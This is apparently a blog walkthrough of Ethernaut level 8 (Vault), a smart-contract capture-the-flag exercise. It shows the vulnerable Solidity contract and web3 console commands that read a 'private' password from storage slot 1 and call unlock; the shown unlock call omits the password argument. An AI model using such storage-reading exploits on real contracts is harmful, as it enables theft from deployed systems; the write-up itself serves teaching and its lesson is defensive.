This is the level 8 of Ethernaut game.
Pre-requisites
- Layout of state variables in Solidity
- Reading storage at a slot in contract
Hack
Given contract:
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Vault {
bool public locked;
bytes32 private password;
constructor(bytes32 _password) public {
locked = true;
password = _password;
}
function unlock(bytes32 _password) public {
if (password == _password) {
locked = false;
}
}
}
player
has to set locked
to false.
Only way is by calling unlock
by correct password.
Although password
state variable is private, one can still read a storage variable by determining it's storage slot. Therefore sensitive information should not be stored on-chain, even if it is specified private
.
Above, the password
is at a storage slot of 1 in Vault
.
Let's read it:
password = await web3.eth.getStorageAt(contract.address, 1)
Call unlock
with password
:
await contract.unlock()
Unlocked. Verify by:
await contract.locked() === false
And that's it.
Learned something awesome? Consider starring the github repo 😄
and following me on twitter here 🙏
Top comments (0)